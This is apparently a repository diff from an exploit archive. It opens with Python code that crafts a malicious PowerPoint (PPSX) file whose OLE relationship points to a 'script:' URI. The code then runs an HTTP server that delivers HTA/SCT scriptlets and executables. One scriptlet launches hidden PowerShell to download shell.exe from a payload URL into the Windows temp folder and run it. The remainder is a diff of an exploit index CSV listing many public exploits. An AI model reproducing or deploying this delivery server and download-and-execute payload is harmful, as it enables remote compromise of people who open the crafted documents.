# call base to close zip file, organically
try:
super(UpdateableZipFile, self).__exit__(exc_type, exc_val, exc_tb)
if len(self._replace) > 0:
self._rebuild_zip()
finally:
# In case rebuild zip failed,
# be sure to still release all the temp files
self._close_all_temp_files()
self._allow_updates = False
def _close_all_temp_files(self):
for temp_file in self._replace.itervalues():
if hasattr(temp_file, 'close'):
temp_file.close()
def remove_file(self, path):
self._replace[path] = self.DeleteMarker()
def _rebuild_zip(self):
tempdir = tempfile.mkdtemp()
try:
temp_zip_path = os.path.join(tempdir, 'new.zip')
with ZipFile(self.filename, 'r') as zip_read:
# Create new zip with assigned properties
with ZipFile(temp_zip_path, 'w', compression=self.compression,
allowZip64=self._allowZip64) as zip_write:
for item in zip_read.infolist():
# Check if the file should be replaced / or deleted
replacement = self._replace.get(item.filename, None)
# If marked for deletion, do not copy file to new zipfile
if isinstance(replacement, self.DeleteMarker):
del self._replace[item.filename]
continue
# If marked for replacement, copy temp_file, instead of old file
elif replacement is not None:
del self._replace[item.filename]
# Write replacement to archive,
# and then close it (deleting the temp file)
replacement.seek(0)
data = replacement.read()
replacement.close()
else:
data = zip_read.read(item.filename)
zip_write.writestr(item, data)
# Override the archive with the updated one
shutil.move(temp_zip_path, self.filename)
finally:
shutil.rmtree(tempdir)
with UpdateableZipFile(filename, "a") as o:
o.writestr("ppt/slides/_rels/slide1.xml.rels", "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\
<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId3\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\" Target=\"script:"+docuri+"\" TargetMode=\"External\"/><Relationship Id=\"rId2\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout\" Target=\"../slideLayouts/slideLayout1.xml\"/><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing\" Target=\"../drawings/vmlDrawing1.vml\"/></Relationships>")
print "Generated "+filename+" successfully"
def exploitation_rtf():
print "Server Running on ",host,":",port
@ -268,13 +412,30 @@ def server_thread(conn, client_addr):
print "Invalid request from "+client_addr[0]
conn.close()
sys.exit(1)
# check if custom HTA flag is set
if (len(custom)>1):
print "Received request for custom HTA from "+client_addr[0]
try:
size = os.path.getsize(custom)
except OSError:
print "Unable to read exe - "+custom
conn.close()
sys.exit(1)
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/hta\r\n\r\n"
with open(custom) as fin:
data +=fin.read()
conn.send(data)
conn.close()
sys.exit(1)
conn.close()
sys.exit(1)
check_exe_request = url.find('.exe')
if (check_exe_request > 0):
print "Received request for payload from "+client_addr[0]
try:
size = os.path.getsize(payloadlocation)
except OSError:
print "Unable to read"+payloadlocation
print "Unable to read "+payloadlocation
conn.close()
sys.exit(1)
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n"
@ -301,5 +462,96 @@ def server_thread(conn, client_addr):
sys.exit(1)
except socket.error, ex:
print ex
def exploitation_ppsx():
print "Server Running on ",host,":",port
try:
# create a socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# associate the socket to host and port
s.bind((host, port))
# listenning
s.listen(BACKLOG)
except socket.error, (value, message):
if s:
s.close()
print "Could not open socket:", message
sys.exit(1)
# get the connection from client
while 1:
conn, client_addr = s.accept()
# create a thread to handle request
thread.start_new_thread(server_thread, (conn, client_addr))
s.close()
def server_thread(conn, client_addr):
# get the request from browser
try:
request = conn.recv(MAX_DATA_RECV)
if (len(request) > 0):
# parse the first line
first_line = request.split('\n')[0]
# get method
method = first_line.split(' ')[0]
# get url
try:
url = first_line.split(' ')[1]
except IndexError:
print "Invalid request from "+client_addr[0]
conn.close()
sys.exit(1)
# check if custom SCT flag is set
if (len(custom)>1):
print "Received request for custom SCT from "+client_addr[0]
try:
size = os.path.getsize(custom)
except OSError:
print "Unable to read custom SCT file - "+custom
conn.close()
sys.exit(1)
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n"
with open(custom) as fin:
data +=fin.read()
conn.send(data)
conn.close()
sys.exit(1)
conn.close()
sys.exit(1)
check_exe_request = url.find('.exe')
if (check_exe_request > 0):
print "Received request for payload from "+client_addr[0]
try:
size = os.path.getsize(payloadlocation)
except OSError:
print "Unable to read"+payloadlocation
conn.close()
sys.exit(1)
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n"
with open(payloadlocation) as fin:
data +=fin.read()
conn.send(data)
conn.close()
sys.exit(1)
if method in ['GET', 'get']:
print "Received GET method from "+client_addr[0]
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 1000\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n<?XML version=\"1.0\"?>\r\n<package>\r\n<component id='giffile'>\r\n<registration\r\n description='Dummy'\r\n progid='giffile'\r\n version='1.00'\r\n remotable='True'>\r\n</registration>\r\n<script language='JScript'>\r\n<![CDATA[\r\n new ActiveXObject('WScript.shell').exec('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\\'"+payloadurl+"\\', \\'c:/windows/temp/shell.exe\\'); c:/windows/temp/shell.exe');\r\n]]>\r\n</script>\r\n</component>\r\n</package>\r\n"
conn.send(data)
conn.close()
sys.exit(1)
except socket.error, ex:
print ex
if __name__ == '__main__':
main(sys.argv[1:])

27
files_exploits.csv
View file

@ -5883,6 +5883,8 @@ id,file,description,date,author,type,platform,port
44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
44213,exploits/hardware/dos/44213.html,"Nintendo Switch - WebKit Code Execution (PoC)",2017-03-12,qwertyoruiop,dos,hardware,
44215,exploits/multiple/dos/44215.m,"Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - 'bluetoothd' Memory Corruption",2018-02-28,"Zimperium zLabs Team",dos,multiple,
44221,exploits/windows/dos/44221.py,"SEGGER embOS/IP FTP Server 3.22 - Denial of Service",2018-03-02,hyp3rlinx,dos,windows,
44222,exploits/windows/dos/44222.txt,"DualDesk 20 - 'Proxy.exe' Denial of Service",2018-03-02,hyp3rlinx,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -7037,7 +7039,7 @@ id,file,description,date,author,type,platform,port
14503,exploits/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Local Buffer Overflow (SEH)",2010-07-29,Madjix,local,windows,
14527,exploits/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Local Buffer Overflow (1)",2010-08-02,s-dz,local,windows,
14532,exploits/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter - Local Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",local,windows,
14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Local Privilege Escalation / Jailbreak",2010-08-03,jailbreakme,local,ios,
14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Local Privilege Escalation 'Jailbreak'",2010-08-03,jailbreakme,local,ios,
14550,exploits/windows/local/14550.py,"Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow",2010-08-04,"Oh Yaw Theng",local,windows,
14566,exploits/windows/local/14566.c,"Microsoft Windows - 'win32k.sys' Driver 'CreateDIBPalette()' Local Buffer Overflow",2010-08-06,Arkon,local,windows,
14576,exploits/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Local Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",local,windows,
@ -7059,7 +7061,7 @@ id,file,description,date,author,type,platform,port
14720,exploits/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow",2010-08-23,"James Fitts",local,windows,
14721,exploits/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
14723,exploits/windows/local/14723.c,"Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
14727,exploits/windows/local/14727.py,"Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow / Jailbreak",2010-08-24,"Jose Miguel Esparza",local,windows,
14727,exploits/windows/local/14727.py,"Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow 'Jailbreak'",2010-08-24,"Jose Miguel Esparza",local,windows,
14726,exploits/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
14728,exploits/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",local,windows,
14730,exploits/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",local,windows,
@ -9020,7 +9022,7 @@ id,file,description,date,author,type,platform,port
38362,exploits/windows/local/38362.py,"MakeSFX.exe 1.44 - Local Stack Buffer Overflow",2015-09-30,hyp3rlinx,local,windows,
38371,exploits/osx/local/38371.py,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Local Privilege Escalation",2015-10-01,rebel,local,osx,
38381,exploits/windows/local/38381.py,"WinRar < 5.30 Beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,local,windows,
38382,exploits/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - '.asx' Local Stack Overflow",2015-10-02,ex_ptr,local,windows,
38382,exploits/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 (Windows XP SP3) - '.asx' Local Stack Overflow",2015-10-02,ex_ptr,local,windows,
38390,exploits/linux/local/38390.c,"Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation",2013-03-13,"Sebastian Krahmer",local,linux,
38403,exploits/windows_x86/local/38403.txt,"TrueCrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",local,windows_x86,
38423,exploits/windows/local/38423.py,"VeryPDF Image2PDF Converter - Local Buffer Overflow (SEH)",2015-10-08,"Robbie Corley",local,windows,
@ -9335,7 +9337,7 @@ id,file,description,date,author,type,platform,port
43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows,
43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - Jailbreak (WebKit / 'namedobj ' Kernel Loader)",2017-12-27,Specter,local,hardware,
43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - 'Jailbreak' WebKit / 'namedobj ' Kernel Loader",2017-12-27,Specter,local,hardware,
43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux,
43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation",2018-01-03,mr_me,local,windows,
43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple,
@ -9359,6 +9361,7 @@ id,file,description,date,author,type,platform,port
44024,exploits/linux/local/44024.rb,"glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
44025,exploits/linux/local/44025.rb,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
44042,exploits/windows/local/44042.md,"Hotspot Shield - Information Disclosure",2018-01-30,SecuriTeam,local,windows,
44217,exploits/windows/local/44217.py,"IrfanView 4.44 Email Plugin - Buffer Overflow (SEH)",2018-03-02,bzyo,local,windows,
44049,exploits/linux/local/44049.md,"Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation",2017-11-23,SecuriTeam,local,linux,
44063,exploits/windows/local/44063.md,"Nitro Pro PDF - Multiple Vulnerabilities",2017-07-24,SecuriTeam,local,windows,
44064,exploits/linux/local/44064.md,"Odoo CRM 10.0 - Code Execution",2017-06-30,SecuriTeam,local,linux,
@ -9549,12 +9552,14 @@ id,file,description,date,author,type,platform,port
44168,exploits/windows_x86-64/local/44168.py,"NoMachine < 6.0.80 (x64) - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86-64,
44169,exploits/windows/local/44169.txt,"Armadito Antivirus 0.12.7.2 - Detection Bypass",2018-02-22,"Souhail Hammou",local,windows,
44177,exploits/hardware/local/44177.c,"Sony Playstation 4 (PS4) 4.07 < 4.55 - 'bpf' Local Kernel Code Execution (PoC)",2018-02-26,qwertyoruiop,local,hardware,
44218,exploits/windows/local/44218.py,"IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)",2018-03-02,bzyo,local,windows,
44198,exploits/hardware/local/44198.md,"Sony Playstation 4 (PS4) 3.50 < 4.07 - WebKit Code Execution (PoC)",2017-04-08,Specter,local,hardware,
44199,exploits/hardware/local/44199.md,"Sony Playstation 4 (PS4) 3.15 < 3.55 - WebKit Code Execution (PoC)",2016-09-06,"TJ Corley",local,hardware,
44200,exploits/hardware/local/44200.md,"Sony Playstation 3 (PS3) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware,
44200,exploits/hardware/local/44200.md,"Sony Playstation 4 (PS4) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware,
44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux,
44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
38457,exploits/windows/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -10366,7 +10371,7 @@ id,file,description,date,author,type,platform,port
4488,exploits/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 - Arbitrary File Overwrite",2007-10-05,shinnai,remote,windows,
4506,exploits/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution",2007-10-09,shinnai,remote,windows,
4514,exploits/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow",2007-10-10,bangus/magnum,remote,linux,
4522,exploits/ios/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation / Jailbreak",2007-10-11,"Niacin & Dre",remote,ios,
4522,exploits/ios/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation 'Jailbreak'",2007-10-11,"Niacin & Dre",remote,ios,
4526,exploits/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method",2007-10-12,Katatafish,remote,windows,
4530,exploits/multiple/remote/4530.pl,"Apache Tomcat - 'WebDAV' Remote File Disclosure",2007-10-14,eliteboy,remote,multiple,
4533,exploits/linux/remote/4533.c,"eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow",2007-10-15,mu-b,remote,linux,4501
@ -16276,7 +16281,11 @@ id,file,description,date,author,type,platform,port
44175,exploits/windows/remote/44175.rb,"CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,8888
44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999
44187,exploits/windows/remote/44187.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow (SEH)",2018-02-27,bzyo,remote,windows,
44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - Jailbreak (WebKit 5.01 / 'bpf' Kernel Loader 4.55)",2018-02-27,Specter,remote,hardware,
44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' WebKit 5.01 / 'bpf' Kernel Loader 4.55",2018-02-27,Specter,remote,hardware,
44226,exploits/php/remote/44226.txt,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution",2018-03-02,"Manish Tanwar",remote,php,
44227,exploits/php/remote/44227.php,"Joomla! 3.7 - SQL Injection",2017-07-04,"Manish Tanwar",remote,php,
44228,exploits/php/remote/44228.php,"Posnic Stock Management System - SQL Injection",2017-02-03,"Manish Tanwar",remote,php,
44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -25602,7 +25611,7 @@ id,file,description,date,author,type,platform,port
18222,exploits/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,webapps,php,
18224,exploits/php/webapps/18224.php,"Docebo Lms 4.0.4 - 'Messages' Remote Code Execution",2011-12-09,mr_me,webapps,php,
18230,exploits/php/webapps/18230.txt,"Family CMS 2.7.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2011-12-10,"Ahmed Elhady Mohamed",webapps,php,
18231,exploits/php/webapps/18231.txt,"WordPress Plugin UPM-POLLS 1.0.4 - Blind SQL Injection",2011-12-11,Saif,webapps,php,
18231,exploits/php/webapps/18231.txt,"WordPress Plugin UPM Polls 1.0.4 - Blind SQL Injection",2011-12-11,Saif,webapps,php,
18232,exploits/php/webapps/18232.txt,"FCMS CMS 2.7.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",webapps,php,
18233,exploits/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,webapps,php,
18236,exploits/php/webapps/18236.txt,"Pixie 1.04 - Blog Post Cross-Site Request Forgery",2011-12-11,hackme,webapps,php,
@ -38935,3 +38944,5 @@ id,file,description,date,author,type,platform,port
44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,
44219,exploits/hardware/webapps/44219.txt,"D-Link DIR-600M Wireless - Cross-Site Scripting",2018-03-02,"Prasenjit Kanti Paul",webapps,hardware,
44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,

Can't render this file because it is too large.